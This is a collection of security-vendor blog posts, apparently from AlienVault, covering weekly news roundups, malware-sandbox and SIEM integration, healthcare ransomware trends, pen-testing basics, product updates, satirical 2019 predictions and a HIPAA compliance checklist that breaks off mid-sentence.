What a wild week it’s been. There have been assaults on researchers (ok, just one that I know of), there’s a great look into changing company cultures, and RDP has a flaw. All this and more, in this week’s action-packed edition of things I hearted this week. Assaulting Researchers The short version is that researchers found a significant vulnerability in a vendor's Casino app, they reported it, and for their troubles, were assaulted by the COO. Probably not the bounty any researcher wants in return for trying to do the right thing. It reads out as a mixture between a good novel, and something you’d imagine playing out on Jerry Springer. There’s not enough popcorn for this. Researcher Assaulted By A Vendor After Disclosing A Vulnerability | Secjuice Analyzing the 2019 RSA Innovation Sandbox Finalists With RSA fast approaching, Kelly Shortridge dons her analyst hat and gets to work. This time examining the innovation sandbox finalists and their finding status. Analyzing the 2019 RSA Innovation Sandbox Finalists | Medium, Kelly Shortridge Related, Kelly’s 2018 BlackHat USA 2018 business hall analysis Analyzing the Black Hat USA 2018 Business Hall | Medium, Kelly Shortridge And while it’s a couple of years old now, I can’t talk about analysing RSA without Cyentia Institute’s brilliant analysis of 15,000 RSAC CFP submissions to uncover trends and evolution. These cybersecurity words are golden - and so are their insights | RSA How Hackers and Scammers Break Into iCloud-Locked iPhones In a novel melding of physical and cybercrime, hackers, thieves, and even independent repair companies are finding ways to "unlock iCloud" from iPhones. How Hackers and Scammers Break into iCloud-Locked iPhones | Motherboard Changing Cultures These days in infosec, we hear a lot about culture change, in particular how it relates to security awareness and training. But one has to sometimes look far and wide for examples of where a culture has been successfully changed that has benefited the people as much as the company. This is a fantastic and insightful article into how Satya Nadella tackled the culture challenge within Microsoft. How do you turn around the culture of a 130,000-person company? Ask Satya Nadella | Quartz Accidental Personal Info Disclosure Hit Australians 260,000 Times Last Quarter The latest quarterly report on Australia's Notifiable Data Breaches (NDB) scheme has revealed around 269,621 separate cases of individuals having their personal information impacted as a result of a human error. The report [PDF] says that during the period covering October 1, through to December 31, 2018, 262 notifications of data breaches were received by the Office of the Australian Information Commissioner (OAIC), with 85 being put down to human error. Accidental personal info disclosure hit Australians 260,000 times last quarter | ZDNet WhatsApp 'Deleting 2m Accounts a Month' to Stop Fake News WhatsApp says it is deleting 2m accounts per month as part of an effort to blunt the use of the world’s most popular messaging app to spread fake news and misinformation. The Facebook-owned service published the data as part of a white paper on “stopping abuse” that was launched on Wednesday in India, the biggest market for the company with more than 200m users. WhatsApp 'deleting 2m accounts a month' to stop fake news | Guardian The Nightmare on Service Desk Street Many “ITIL aligned” service desk tools have flawed incident management. The reason is that incidents are logged with a time association and some related fields to type in some gobbledygook. The expanded incident life cycle is not enforced and as a result trending and problem management is not possible. The nightmare on service desk street | Medium, Ronald Bartels Remote Desktop Protocol Flaws Could Be Exploited to Attack RDP Clients A research firm has disclosed multiple vulnerabilities in the Remote Desktop Protocol that, if left unpatched, could allow compromised or infected machines to attack the RDP clients that remotely connect to them. In a blog post, Check Point Software Technologies researcher Eyal Itkin refers to this scenario as a reverse RDP attack because the RDP servers installed on the compromised machines essentially reverse the normal direction of RDP communication in order to control and execute code on the client device. Reserve RDP attack | Checkpoint Remote Desktop Protocol flaws could be exploited to attack RDP clients | SC Magazine Google's New Chrome Extension Warns You If Your Passwords Have Been Exposed Google has rolled out two new tools to help the password-challenged beef up their security game. The first is a Chrome extension called Password Checkup that can identify if you’re using a password that’s been exposed in a third-party data breach. The second is a feature called Cross Account Protection, which helps protect apps you’ve signed into with your Google account. Google's New Chrome Extension Warns You If Your Passwords Have Been Exposed | Gizmondo Other Stories I Hearted This Week Apps you've never heard of that your teen is already using | CNN When Bad Behavior Goes Viral | Medium, James Rush
Rohan Viegas of VMRay explains some of the key factors IT security teams should consider when evaluating a malware analysis sandbox and whether it’s a good fit for their existing SIEM environment. He then outlines how VMRay Analyzer complements and enhances the capabilities of AlienVault’s flagship platform, USM Anywhere. For IT security organizations, malware threats and attacks continue to play a prominent role in the threat landscape. According to Verizon’s 2018 Data Breach Investigations Report: Of the 2,216 data breaches that were studied by participating security vendors, 30% involved malware. Six types of malware (ransomware, C2, RAM scraper, backdoor, etc.) were among the top 20 varieties of action used in the data breaches covered in the study. Ransomware, used primarily to commit financial crimes, is now involved in more than 40% of malware attacks. Malware attacks can be completed in minutes. However, due primarily to poor detection, an intrusion may not be discovered for weeks or months, potentially causing damage all the while. “Full-featured SIEM, Looking for the Right Malware Sandbox” When selecting an automated malware analysis sandbox to address these challenges, IT security teams should not only compare the side-by-side capabilities of different vendor products. They should also weigh how a particular sandbox will interact with their existing SIEM platform and the extent to which a product’s strengths (or its weaknesses) are utilized across the managed security ecosystem. Below are some key points to consider. The sandbox’s detection efficacy. Malware today is designed to recognize when it is running inside an analysis environment and to stall or exit in the sandbox, thereby evading detection altogether or inhibiting the analysis by not fully revealing its behavior. This leaves blind spots in the analysis results, which can then be carried over to the SIEM. A key quality to look for in a sandbox is its ability to reliably conceal itself from the samples being analyzed so the malware can fully execute, giving you comprehensive visibility into the threat. The quality of Threat Intelligence that can be shared. Another consideration is what types of threat information can be ingested by your SIEM and made available across your security environment. Important IOCs include severity scores, suspicious behaviors, network activity, dropped files etc. You also need to consider how complete that information is. Full visibility into malware behavior is essential for generating quality threat intelligence. For instance, if you discover a malicious file, the analysis results should detail all the places it tried to reach out to, all the bad files it tried to create, and all the registry keys it tried to touch or modify. How can the Threat Intelligence be used once your analysis results are handed off to your SIEM? Can the data be easily monitored? Correlated with other data sources? What actions can you take with this information? To build on the prior example, if your sandbox identifies a new malicious file that has reached out to an unfamiliar and presumably bad IP address, can you search your entire infrastructure for systems that have also accessed that address? Rising to the Challenge For organizations that have USM Anywhere or another comprehensive SIEM platform in place, adding VMRay Analyzer to the managed security environment addresses these core challenges, strengthening the ability to detect and respond to malware threats, attacks and vulnerabilities more quickly and effectively. Unlike traditional malware sandbox solutions, VMRay Analyzer runs solely in the hypervisor layer and does not modify a single bit in the analysis environment. The sandbox remains completely invisible to the malware sample and can transparently monitor all aspects of the malware’s behavior, without triggering the evasion techniques that thwart detection and analysis in other sandboxes. In turn, analysis results provide complete and detailed visibility VMRay Analyzer’s Intelligent Monitoring engine, for example works much like an auto-zoom lens on a camera, adjusting to find the optimal level of monitoring. This allows analysts to distinguish between legitimate operations performed by the OS and trusted applications and unusual or malicious activities performed by the monitored sample. The result is to ensure security teams don’t miss any critical information while also delivering results that are precise and noise-free, with minimal false positives. Once VMRay malware analysis results are ingested by the SIEM, using VMRay’s REST API interface, that information gains wider use and greater value. It can be monitored, searched, correlated with other data sources, and shared with security devices, such as firewalls and endpoint protection system. It can also be investigated and acted upon. In addition, VMRay also has an out-of-the-box SIEM integration by publishing analysis alerts in Syslog/CEF format. These customizable syslog messages are generated when critical events occur. Here are some of the ways VMRay Analyzer makes SIEM environments, such as USM Anywhere, more efficient, useful and comprehensive. Ensures timely analysis and detection of zero day and polymorphic threats—as well as known threats—and translates that information into actionable intelligence. Automatically propagates analysis results (including sample details, severity scores, IOCs, network activity and YARA rule matches) to the SIEM’s centralized environment. Improves the productivity and effectiveness of analysts and incident responders by providing all the information they need and only the information they need to analyze and respond to malware threats, vulnerabilities and attacks. Eliminates the productivity-killing noise and false positives that many sandboxes generate, while also ensuring irrelevant information is not pumped into the SIEM environment. Continually adds to the malware-related threat intelligence that is made available to the SIEM. Sandboxes and SIEMs work in tandem to effectively detect malware or respond to a security breach. Choosing an evasion-resistant sandbox that generates precise, actionable Threat Intelligence ensures that you will have a good fit with your existing SIEM environment.
Healthcare is under fire and there’s no sign of the burn slowing. Look, it’s no secret that hackers have been targeting hospitals and other healthcare providers for several years — and probably no surprise that healthcare is one of the top target industries for cybercrime in 2018. In the US alone, in fact, more than 270 data breaches affecting nearly 12 million individuals were submitted to the U.S. HHS Office for Civil Rights breach portal (as of November 30, 2018). This includes the likes of unauthorized access or disclosures of patient data, hacking, theft of data, data loss and more. Bottom line, if you’re tasked with protecting any entity operating in the healthcare sector, you’re likely experiencing some very sleepless nights — and may just need a doctor yourself. So . . . who’s wreaking all this havoc and how? According to AlienVault Labs, opportunistic ransomware is still a preferred method of attack. However, researchers are reporting a rise in the number of targeted ransomware attacks in the healthcare sector. These attacks are often backed by organized criminals who see opportunities for making money from healthcare providers and other similar entities who must protect and keep assets, systems, and networks continuously operating. One such criminal group operating the SamSam ransomware is thought to have earned more than $5 million dollars by manually compromising critical healthcare networks (see below for more info). The group behind SamSam has invested heavily in their operations (likely an organized crime syndicate) and has won the distinction of being the subjects of two FBI Alerts in 2018. And, according to AlienVault Labs, the methods used by SamSam are more akin to a targeted attack than typical opportunistic ransomware. SamSam attacks also seem to go in waves. One of the most notable was a spring 2018 hit on a large New York hospital which publicly declined to pay the attacker’s $44,000 ransomware demand. It took a month for the hospital’s IT system to be fully restored. SamSam attackers are known to: Gain remote access through traditional attacks, such as JBoss exploits Deploy web-shells Connect to RDP over HTTP tunnels such as ReGeorg Run batch scripts to deploy the ransomware over machines SamSam isn’t going away either. AlienVault Labs has seen recent variants. You might want to read more about the threat actors behind SamSam, their methods of attacks, and recommendations for heading it off in the AlienVault Open Threat Exchange (OTX), our community of 100,000 users who contribute information on threat intelligence which is also curated by AlienVault Labs. You can also get more details from the AlienVault blog post “SamSam Ransomware Targeted Attacks Continue.” And, you can find detailed recommendations for preparing for SamSam and other, related attacks from HHS, FBI and US-CERT. Wait! There’s More. Here’s an overview of the trending threats AlienVault Labs has identified for 2018. What We’re Seeing How to Learn More Other, opportunistic ransomware threats for criminal gain . . . The most commonly seen threat to the healthcare in 2018 remains opportunistic. This is typically ransomware that targets anyone who happens to be vulnerable. And, it continues to cause an outsized amount of damage to the industry. Some examples of the most damaging will likely trigger your memory: WannaCry Indicators, GrandCrab Ransomware, VSSDestroy Ransomware Defray ransomware Off-the-shelf ransomware used to target the healthcare sector GandCrab ransomware puts the pinch on victims VSSDestroy ransomware WannaCry indicators Fallout exploit kit releases the Kraken ransomware on Its victims Targeted threats for criminal gain . . . There are a number of organized criminals who have moved to targeting healthcare providers with targeted ransomware due to the criticality of continued operation. One example is the SamSam ransomware. SamSam ransomware campaigns SamSam — the evolution continues netting over $325,000 in 4 weeks SamSam ransomware SamSam: the doctor will see you, after he Pays the ransom Targeted threats for espionage that are led by organized crime . . . Threat actors are committing corporate espionage for criminal gain — for example, by gaining insight into drug trials to inform investment decisions. Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia Powerful threat actor Wild Neutron returns for economic espionage FIN4 group is hacking the street More information from the FIN4 group attacking public companies Parasite HTTP RAT cooks up a stew of stealthy tricks Targeted threats for espionage, let by nation states . . . Whilst rare, there are some threat actors that commit espionage against the healthcare sector to provide assistance to state-owned companies or to retrieve the healthcare data of high-profile individuals. Network health: advanced cyber threats to the medical & life sciences industries Tropic Troopers new strategy Intrusions affecting multiple victims across multiple sectors Wekby attacks use DNS for C2 Indian organizations targeted in Suckfly attacks Black Vine: Formidable cyberespionage group Want more information? There are a number of organizations, such as Healthcare-ISAC, that can provide additional information on threats seen within the healthcare sector. For any queries regarding this report, please contact email@example.com.
What is Penetration Testing? Penetration testing, often called “pen testing” is one of several techniques used to verify cybersecurity posture and provide a level of assurance to the organization that its cyber defenses are functional. It’s a way of testing defenses against an adversary who mimics a cyber-criminal actor. First Rule of Network Penetration Testing: Make sure you have a signed contract to perform the services of a pen tester, including a statement of work, and a detailed scope for the engagement. Failure to follow this advice could result in civil and/or criminal legal action being taken against you. It should be noted that many compliance and regulatory requirements, including the General Data Protection Regulation (GDPR) require an organization to undertake regular testing to evaluate the effectiveness of organizational security controls. It stands to reason that the further an adversary can penetrate into your organization and retrieve sensitive and/or confidential information, the more evident the business case for improving your cyber security posture becomes. The technique of cyber security pen testing is not without controversy. Detractors of pen testing as a cybersecurity test identify the techniques used by professional pen testers as generally reserved for sophisticated cyber criminals or nation state actors. The argument then is pen testing does not mimic the “every day” cybersecurity threat faced by the organization based upon the level of risk tolerance. Although that argument runs right up against the evolution of and increasing sophistication of cyber-criminal attacks, an organization may not have the financial or IT resources to deal with the outcomes or recommendations of the pen test. In fact, a pen test can be a demoralizing experience for the organization’s already stressed IT resources and potentially document risks the organization would rather not have illuminated. Simply put, a pen test requires a basic level of cyber hygiene and organizational readiness – there has to be organizational will to mitigate the “findings” of the pen test. If the organization has not instituted basic cyber security controls as prescribed by UK Cyber Security Essentials or the CIS top five security controls, then money invested in a pen test may be quite wasteful. In short, If the organization has not: 1. Secured the internet connection with a firewall 2. Secured organizational devices and software 3. Controlled access to organizational data and services 4. Protected organizational endpoints from viruses and other malware 5. Made sure organizational devices and software are up to date Then the pen test will not go well for your organization and an adversary will have a field day. Penetration Testing Tools There is a myriad of pen testing tools available with the majority being open source. The profession of Pen Tester is linked to professional certifications such as Certified Ethical Hacker, CompTIA Pen Test+ and Offensive Security Certified Professional (OSCP), and an extensive SANS curriculum all built around pen testing and use of popular tools is available. Here is a list of common pen testing tools (OK, my favorite tools!) pen testers will unleash on an organization. Many folks in the business of professional pen testing have their own preferences and/or professional software is also available. Common Network Penetration Testing Tools Nmap – Free! Network scanner and enumerator, supported by a massive community and extensible with a great deal of scripting capability. The Metasploit Framework available on Kali Linux – Free! Many special purpose pen testing tools, password crackers as well as wireless security tools. I would say this is an accepted industry standard. Zap – Free! An older attack proxy framework used to evaluate website and web application security. I like it and find it easy to use as I am not skilled enough to use something like Burp Suite against a website. Nessus – Not free. This software does require professional licensing to use as a professional pen tester, but it is an excellent vulnerability scanner. (Another one I recommend is Outpost 24.) Maltego Community Edition – Free! This does not do any pen testing but it is my go-to-documentation tool for network mapping and domain enumeration. Mostly a cyber threat intel platform but to make the pretty pictures it’s a lot more automated than Microsoft Visio. As a professional pen-tester you are only as good as your Google-Fu. Depending on the nature of your engagement, websites like Shodan, ExploitDB, or even searching for “Default Password for <insert make> <model number> device” will yield sources of information which may provide useful. It’s also surprising how frequently reverse IP lookups and domain name registration information is necessary to conduct the pen test. Website Penetration Testing This is really a subset of network penetration testing and is firmly (at least in my opinion) in the realm of software developer meets adversary. Websites are complex layers of software which usually connect to a “back-end” database. The database is potentially filled with customer or employee information which a cyber-criminal would like to steal & sell and/or destroy with ransomware. Thousands of hours of developer time may have gone into the creation of customer facing websites and they may even have access to credit card payment information. No matter what the database contains it needs to be defended and it is through any number of techniques a cyber-criminal can gain unauthorized access. Although a scanner like Burp Suit or ZAP can detect many of the OWASP 10 common vulnerabilities, a skilled web application pen tester can target the website’s API(s) to perhaps coax information from the site which should not be revealed. Because websites are intensely linked to the organization’s online brand and may be a primary source of revenue, many organizations insist on a web application pen test before a site goes live. Penetration Testing Report In most cases this is called the “dread” pen testing report. For most organizations who thought they had a decent security posture, this report usually suggests a lot more can or needs to be done. What makes for a good report is a list of the most impactful, readily achievable, and least expensive to implement solutions to the discovered shortcomings. The best pen test report also identifies items which the organization is doing well in addition to items the organization needs to improve upon to allow for some solace as the mountain of work to do is revealed. One of the most powerful metrics and a significant boost to organizational compliance is to use the pen test report as a road map for key IT projects, process or technology implementations in the next year. The first pen test the organization receives sets the need for future improvement. The second pen test report should have measurable improvements. If there has been no improvement between the two it may be time to consider a radical course of improvement before your organization is targeted by a real cyber-criminal adversary.
At AWS re:Invent recently, I spoke to several booth visitors who asked, “What’s new with AlienVault?” It was exciting to talk through some of the improvements we’ve made over the last year and see their eyes widen as the list went on. As our customers know, we regularly introduce new features to USM Anywhere and USM Central to help teams detect and respond to the latest threats. You can keep up with our regular product releases by reading the release notes in the AlienVault Product Forum. Let’s take a look at the highlights from our October and November releases: Mac OS Support for the AlienVault Agent In July, we announced the addition of endpoint detection and response (EDR) capabilities to USM Anywhere, enabled by the AlienVault Agent. The AlienVault Agent is an osquery-based endpoint agent that provides system-level security, including file integrity monitoring and host intrusion detection (HIDS). Over the last few months, we’ve listened carefully to customer input to guide our continued improvement of the AlienVault Agent, leading us to improve filtering rules for better control over data consumption and make a number of additional enhancements. In November, we addressed a top customer request with the addition of Mac OS support for the AlienVault Agent. Now, USM Anywhere customers can use the AlienVault Agent for continuous threat detection and file integrity monitoring (FIM) on their Linux, Windows, and Mac hosts. AlienVault Agent Queries as Response Actions USM Anywhere accelerates incident response with the ability to orchestrate response actions directly from an alarm. With just a few clicks, you can take an immediate, one-time action or create a rule to make sure that action happens automatically going forward. (Check out examples of automated incident response in action in this blog post.) To enhance your ability to respond swiftly and efficiently to potential threats, we’ve added a new response action to trigger AlienVault Agent queries. Like our other response actions, you can find this option directly from the detail view of an alarm or as part of an orchestration rule. Launch AlienVault Agent Queries from Agents Page In addition to the response action listed above, you can now trigger AlienVault Agent queries from the Agents page by clicking the “Run Agent Query” button. You can run queries against a single asset or all assets that have the AlienVault Agent installed. Asset Group Enhancements for the AlienVault Agent Asset Groups help USM Anywhere users group similar assets for specific purposes. For example, you might want to assign assets to the PCI DSS asset group to keep track of the assets in scope of your CDE. We’ve added a new “Assets with Agents” dynamic asset group containing all assets that have the AlienVault Agent deployed. We’ve also expanded asset group functionality by adding the ability to assign AlienVault Agent profiles to asset groups. You can do this by selecting the “Assign Agent Profile” option from the Actions menu for a specific asset group. Improved Ability to View Suppressed Alarms We’ve improved the filtering options available on the Alarms page to support the display of only suppressed alarms. This change has no effect the default Alarms view, which does not include suppressed alarms. Certificate Upload for TLS-Encrypted Syslog In addition to the digital certificate provided through USM Anywhere, customers can now upload their own server certificate and CA certificate to enable the SSL connection for TLS-encrypted syslog transport. Certificates can be uploaded from a new Settings tab in the Syslog App configuration page located at Data
It’s hard to believe the whole year has gone past and I’ve been hearting things nearly every week since it began. I’d like to sum up 2018, so I started to look through all the posts from every week and I realised it was a mammoth task. There have been 40 “Things I hearted” blog posts this year, each with an average of 10 stories. And that doesn’t include the dozens of other stories that didn’t make the cut every week. Suffice to say, it’s been a very busy year as far as information security is concerned. Which could mean that business is very good. Or it could just mean that business is as usual, we’re just getting better at covering the stories. In YouTube fashion, I decided to do a video rewind of some of the notable stories of the year (minus Will Smith and the big budget) Conspiracy videos aside, let’s have a recap of an assortment of stories that were hearted over the course of the year. January 12th Edition Toy Firm VTech Fined Over Data Breach VTech, the ‘smart’ toy manufacturer has been fined $650,000 by the FTC after exposing the data of millions of parents and children. Troy Hunt brought up the issue back in November 2015 and it made for a chilling read. Not only was the website not secure, but the data was not encrypted in transit or at rest. Hopefully, this kind of crackdown on weak ‘smart’ devices will continue until we see some changes. Not that I enjoy seeing companies being fined, but it doesn’t seem like many manufacturers are paying much attention to security. FTC fines VTech toy firm over data breach | SC Magazine FTC Fines IoT Toy Vendor VTech for Privacy Breach | eWeek After breach exposing millions of parents and kids, toymaker VTech handed a $650K fine by FTC | Techcrunch March 9th Edition SAML, SSO Many Vulnerabilities SAML-based single sign on systems have some vulnerabilities that allow attackers with authenticated access to trick SAML systems into authenticating as different users without knowledge of the victims’ password. Sounds like a lot of fun. Duo Finds SAML Vulnerabilities Affecting Multiple Implementations | DUO March 30th Edition Investigating Lateral Movement Paths with ATA Even when you do your best to protect your sensitive users, and your admins have complex passwords that they change frequently, their machines are hardened, and their data is stored securely, attackers can still use lateral movement paths to access sensitive accounts. In lateral movement attacks, the attacker takes advantage of instances when sensitive users log into a machine where a non-sensitive user has local rights. Attackers can then move laterally, accessing the less sensitive user and then moving across the computer to gain credentials for the sensitive user. Investigating lateral movement paths with ATA | Microsoft May 18th Edition Hacking the Hackers A hacker has breached Securus, the company that helps cops track phones across the US. You'd think that if you were a company that collected all sorts of phone data, and location tracking, and work with law enforcement, you'd be a bit more careful in how you store the data. Last week, the New York Times reported that Securus obtains phone location data from major telcos, such as AT&T, Sprint, T-Mobile, and Verizon, and then makes this available to its customers. The system by which Securus obtains the data is typically used by marketers, but Securus provides a product for law enforcement to track phones in the US nationwide with little legal oversight, the report adds. In one case, a former sheriff of Mississippi County, Mo., used the Securus service to track other law enforcement official’s phones, according to court records. Hacker breaches securus, the company that helps cops track phones across the US | Motherboard Service meant to monitor inmates' calls could track you, too. | NYTimes June 1st Edition Your Data Looking at your data this week, Brian Krebs flips the lid on why your location data is no longer private. "The past month has seen one blockbuster revelation after another about how our mobile phone and broadband providers have been leaking highly sensitive customer information, including real-time location data and customer account details. In the wake of these consumer privacy debacles, many are left wondering who’s responsible for policing these industries? How exactly did we get to this point? What prospects are there for changes to address this national privacy crisis at the legislative and regulatory levels?" Why Is Your Location Data No Longer Private? | Krebs On Security But wait, there's a plot twist. Tired of all these companies profiting off your data? Well, maybe you can try what this guy did and make some money yourself by directly selling your data. This Guy Is Selling All His Facebook Data on eBay | Motherboard July 6th Edition 10 Things To Know Before Getting Into Cybersecurity You may know Kevin Beaumont as @GossiTheDog on twitter. He won the 2018 EU blogger awards for best tweeter. But apparently, he's a man of more talents than just twits, he also blogs, and has put together a good list of 10 things you should know if you're considering getting into cybersecurity. 10 things to know before getting into cyber security| Double Pulsar Related, if you're looking to break into security, then you'll want to know which locations offer the best salaries (US-based). Cybersecurity spotlight 2018: Where are the highest paying jobs? | Indeed Blog August 31st Edition Probably The Best Tech Keynote in the World I’ll be honest, up until a couple of weeks ago, I hadn’t heard of James Mickens who is a professor at Harvard University. I watched his keynote presentation at Usenix, and haven’t been this entertained and captivated by a technology talk in … well, never. It’s well worth carving out 50 minutes out of your day to watch his keynote entitled, Q: Why Do Keynote Speakers Keep Suggesting That Improving Security Is Possible? A: Because Keynote Speakers Make Bad Life Decisions and Are Poor Role Models October 5th Edition Bupa Fined £175k International health insurance business Bupa has been fined £175,000 after a staffer tried to sell more than half a million customers' personal information on the dark web. The miscreant was able to access Bupa's CRM system SWAN, which holds records on 1.5 million people, generate and send bulk data reports on 547,000 Bupa Global customers to his personal email account. The information – which included names, dates of birth, email addresses, nationalities and administrative info on the policy, but not medical details – was then found for sale on AlphaBay Market before it was shut down last year. Health insurer Bupa fined £175k after staffer tried to sell customer data on dark web souk | The Register November 30th Edition The $1M SIM Swap A 21-year-old has been accused of SIM-swapping the mobile number of a Silicon Valley executive in order to steal roughly $1 million in cryptocurrency. SIM-swapping 21-year-old scores $1 million by hijacking a phone | ZDNet
It’s December, which means it’s time to get those 2019 cyber predictions going. While there are many well-informed, and some not-so-well informed opinions out there, I’ve dug through the cyber underground, I’ve climbed data mountains, and delved to the depths of the dark web to seek out what is really happening. Having spilt coffee, redbull, and tears, I am proud to present the soft underbelly of the cyber security industry, and what the future will hold. You’re welcome. Jayson Street will be exposed as a secret agent charged with obtaining DNA samples of as many hackers as possible. Close inspection will reveal Jayson stealing a strand of hair every time he offers an “awkward hug”. Having been outed, he will go on to start a podcast called, “The word on the Street” HaveIBeenPwned will be purchased by FireEye. Troy Hunt will take the money and move to New Zealand where he’ll setup another website called “YesYouArePwned” with Kim dot com. Bug Bounty and vulnerability disclosure pioneer Katie Moussouris will have no less than 10 instances a month of bug bounties being mansplained to her. At least 2 a month will try to prove her wrong by citing papers, without realising she authored them. Richard Bejtlich will tell the world how it’s actually Papua New Guinea that is responsible for the majority of APT’s. He’ll admit that China was initially blamed as an internal joke that went a bit too far. Jeff Moss will look in disgust at what he has created. In a fit of rage he’ll punch the ground, pull his hair yelling, “I’ve created a monster!” and cancel DEF CON. This will create a domino effect as all other conferences will come collapsing, leaving no security conferences active by the end of the year. SwiftOnSecurity is unmasked as being The Grugq who would have gotten away with it, if it weren’t for those meddling kids. Stuck in traffic YouTuber Wolf Goerlich will finally take a different route into work and realise traffic ain’t all that bad. As a result YouTube suspends his account, declaring the title misleading. Which is a polite way of saying ‘fake news’. Investigative journalist Brian Krebs may unofficially be many companies' IDS, but in 2019 he’ll take it to new heights while launching his own subscription-only service called B-KIDS (Brian Krebs IDS) which companies can use to get the heads up if they’re going to be outed. Reunions will become common, as professionals grow bored of corporate life. L0pht Hacking Industries will furiously lobby the US government, while over in Europe the Eurotrash Security podcast will regroup and take the show on the road once again. Marcus Hutchins reveals he was never really arrested by the FBI. Claims he just wanted a bit of “me time” and thought this would be the best way. (ISC)2 will cease offering the CISSP certification, stating that there is now a global surplus of security professionals and the number needs to be reduced. Independent analyst Kelly Shortridge reveals the magic that goes into magic quadrants, waves and other analyst firms methodologies. Confidence in analyst firms will take a dip as a result. Kelly will then sell the rights to the movie, The Big Short(ridge) Award-winning blogger and podcaster Graham Cluley will go through the whole of 2019 without winning a single award. Mega breaches will have reached the tipping point and GDPR will have been found ineffective. In a last ditch effort, companies that offer affected customers a year's credit monitoring will no longer be deemed sufficient. Rather companies will be forced to create whole new identities for affected individuals, complete with backstories, like witness protection programs do. Finally, world governments will see the error of their ways and stop trying to backdoor crypto. Have a happy 2019 folks!
Let’s face it, managing cyber risk and compliance is hard. Many organizations struggle to gain the visibility needed to truly understand their overall cyber risks. They also struggle to maintain that visibility as they take on digital business transformation and new cloud computing initiatives. It’s no easy task for organizations to continually align their security priorities to changes in the regulatory landscape, their IT environment, and an always-shifting threat landscape, especially for organizations with limited IT resources. That’s why we are excited to announce a new solution to help organizations of any size to help reduce their cyber risks and simplify their journey to work toward compliance. Together, AT&T Cybersecurity Consulting and AlienVault, an AT&T Company, are bringing together the people, process, and technology in one unified solution to help organizations improve cyber risk and compliance management. In doing so, we’re making it simple and fast for organizations to consolidate their requirements and to accelerate their security and compliance goals. Download the solution brief to learn more. “Managing cyber risk and compliance requires an ongoing review of your IT assets and data, security practices, and personnel — and no single security tool provides that holistic visibility,” said Russell Spitler, SVP of Product for AlienVault, an AT&T company, “With a unified solution from AT&T Cybersecurity Consulting and AlienVault, we can help organizations to reduce the complexity and cost of having to juggle multiple products and vendors.” This solution addresses many of the most challenging aspects of meaningful risk reduction (i.e. you are actually making progress in reducing risks, not simply “managing risks,”) and maintaining continuous compliance. The solution includes: risk assessment, scanning and remediation vulnerability assessment, employee cybersecurity awareness training, continuous network monitoring for the latest threats, and reporting for compliance as well as for internal policy. It is ideal for organizations that are getting started with or want to accelerate their efforts for PCI DSS or HIPAA, but also for non-compliance organizations that are looking to evaluate and improve their cyber risk posture quickly and efficiently. Unlike other solutions for cyber risk and compliance that are often oversized and do not adapt to an organization’s existing security model, AlienVault and AT&T Cybersecurity Consulting offer flexible options that allow any organization to tailor-fit a solution to their unique environment, business goals, and budget. The solutions include: Risk-based Cyber Posture Assessment led by AT&T Cybersecurity Consultants ASV-provided External Vulnerability Scanning Services from AT&T Consulting Services AlienVault USM Anywhere - a unified platform for threat detection and response AT&T Cybersecurity IQ Training - cybersecurity user training and assessments For more details on the products and services included in this solution, read the solution brief here > Following AT&T Business’ acquisition of AlienVault in August, this offering is the first to combine the phenomenal threat detection and incident response capabilities of AlienVault USM Anywhere and AlienVault Labs Threat Intelligence with the world-class expertise of AT&T Cybersecurity Consulting. “It’s no secret that cybercrime has become its own industry, giving criminals access to a battery of tools for targeting victims,” said Marcus Bragg, Chief Operating Officer of AlienVault. “For the IT and security professionals who are defending against this, point solutions are no longer enough. They need all the support they can get, and that means people, process, and technology — access to security experts who can share their knowledge and experience, recommendations for best practices, and a unified platform that ties everything together, including the most up-to-date threat intelligence for threat detection and response. That’s what the future looks like in our fight against cybercrime.” This solution is available from AlienVault and AT&T Business, so new and current customers can easily purchase the solution that works for them. To learn more about this and other cybersecurity solutions from AlienVault and AT&T, contact us to get started. To learn more about the offering, download the solution brief.
Five steps to ensuring the protection of patient data and ongoing risk management. Maintaining security and compliance with HIPAA, the Health Insurance Portability and Accountability Act, is growing ever more challenging. The networks that house protected health information (PHI or ePHI) are becoming larger and more complex — especially as organizations move data to the cloud. At the same time, security professionals are faced with an evolving threat landscape of increasingly sophisticated threat actors and methods of attack. For example, 2018 threat intelligence research by AlienVault Labs reports a rise in the number of targeted ransomware attacks in the healthcare sector. These attacks are often backed by organized criminals who see opportunities for making money from health care providers and other similar entities who must protect and keep assets, systems, and networks continuously operating. One such criminal group operating the SamSam ransomware is thought to have earned more than $5 million dollars by manually compromising critical healthcare networks. And, according to AlienVault Labs, the methods used by SamSam are more akin to a targeted attack than typical opportunistic ransomware. To help address these security challenges and ensure adherence to compliance mandates, security and IT professionals should consider how people, processes, and technology can be used together to create a holistic IT security compliance program that simplifies preparation, auditing and reporting, as well as ongoing security risk management and breach monitoring and response. Here’s a five-step HIPAA compliance checklist to get started. Certification and Ongoing HIPAA Compliance HIPAA sets the standard for protecting sensitive patient data. Any entity that deals with protected health information must ensure that all the required physical, network, and process security measures are in place and followed. In 2009, the Health Information Technology for Economic and Clinical Health (HITECH) Act was adopted to promote the “meaningful use of health information technology” and address the privacy and security concerns associated with the electronic transmission of health information. Although there is no standard or implementation specification that requires a covered entity to “certify” compliance, the evaluation standard § 164.308(a)(8) requires covered entities to perform ongoing technical and non-technical evaluations that establish the extent to which their security policies and procedures meet the security requirements. Evaluations can be performed and documented internally or by an external organization that provides evaluation or “certification” services. However, HITECH requires the HHS Office for Civil Rights (OCR) to conduct periodic audits of covered entities and business associates for compliance with the HIPAA Privacy, Security, and Breach Notification Rules. Step 1: Start with a comprehensive risk assessment and gap analysis Your compliance strategy should start with a solid foundation, which is why the first step in your journey to HIPAA compliance should be a readiness assessment that includes a comprehensive risk and compliance analysis of your electronic health record (EHR) environment. This assessment is often best done by a third party with expertise in healthcare security and compliance, as HIPAA regulations can be confusing and cumbersome. Using a third party with the necessary expertise will ensure you don’t miss or misunderstand the required regulations, and it will save you time as they will likely have a HIPAA checklist to reference. Your consultant can perform an initial evaluation of your entire security program to determine its adherence to HIPAA regulations and the level of readiness to proceed with the “certification” process. It’s worth noting that the OCR does not actually “certify” HIPAA compliance (see side bar), however there are organizations outside of the OCR that do provide “certification” services, and many organizations take advantage of these certification services to prove compliance. As a result of the evaluation, your consultant should provide a comprehensive report that may include such things as: Your organization’s current security and compliance posture compared to the requirements established by the OCR Audit Protocol (including the HIPAA Privacy Rule, Security Rule and the Breach Notification Rule). Prioritized recommendations for risk remediation. A road map outlining the steps and initiatives to achieve compliance and “certification”. According to the OCR, organizations that have aligned their security programs to the National Institute for Standards and Technology (NIST) Cybersecurity Framework 